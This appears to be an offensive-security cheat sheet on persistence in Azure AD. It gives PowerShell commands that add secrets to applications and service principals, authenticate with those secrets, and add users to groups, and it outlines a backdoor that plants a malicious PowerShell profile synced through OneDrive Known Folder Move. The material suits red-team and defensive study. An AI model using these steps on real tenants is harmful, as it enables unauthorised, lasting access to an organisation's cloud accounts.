Azure AD - Persistence
Add Secrets to Application
-
Add secrets with lutzenfried/OffensiveCloud/Add-AzADAppSecret.ps1
PS > . C:\Tools\Add-AzADAppSecret.ps1 PS > Add-AzADAppSecret -GraphToken $graphtoken -Verbose -
Use secrets to authenticate as Service Principal
PS > $password = ConvertTo-SecureString '<SECRET/PASSWORD>' -AsPlainText -Force PS > $creds = New-Object System.Management.Automation.PSCredential('<AppID>', $password) PS > Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant '<TenantID>'
Add Service Principal
-
Generate a new service principal password/secret
Import-Module Microsoft.Graph.Applications Connect-MgGraph $servicePrincipalId = "<service-principal-id>" $params = @{ passwordCredential = @{ displayName = "NewCreds" } } Add-MgServicePrincipalPassword -ServicePrincipalId $servicePrincipalId -BodyParameter $params
Add User to Group
Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose
PowerShell Profile Backdoor Using KFM
OneDrive for Business Known Folder Move (KFM) is a feature in Microsoft OneDrive for Business that enables users and organizations to automatically redirect the contents of key Windows user folders; Desktop, Documents, and Pictures from their local PC to OneDrive.
A PowerShell profile is a script file that loads whenever you start a new PowerShell session (such as opening PowerShell or Windows Terminal). Users and administrators often customize their profiles to set aliases, environment variables, functions, or pre-load modules.
Requirements:
Files.ReadWrite.Allprivilege
Methodology:
Known Folder Move moves the user's Documents (and/or Desktop, Pictures) folder to OneDrive for Business, typically syncing:
C:\Users\<username>\Documents β C:\Users\<username>\OneDrive - <TenantName>\Documents
This means the PowerShell profile file (Documents\PowerShell\Microsoft.PowerShell_profile.ps1) will now be synced to OneDrive.
Push a malicious PowerShell profile at $HOME\Documents\PowerShell\Microsoft.PowerShell_profile.ps1.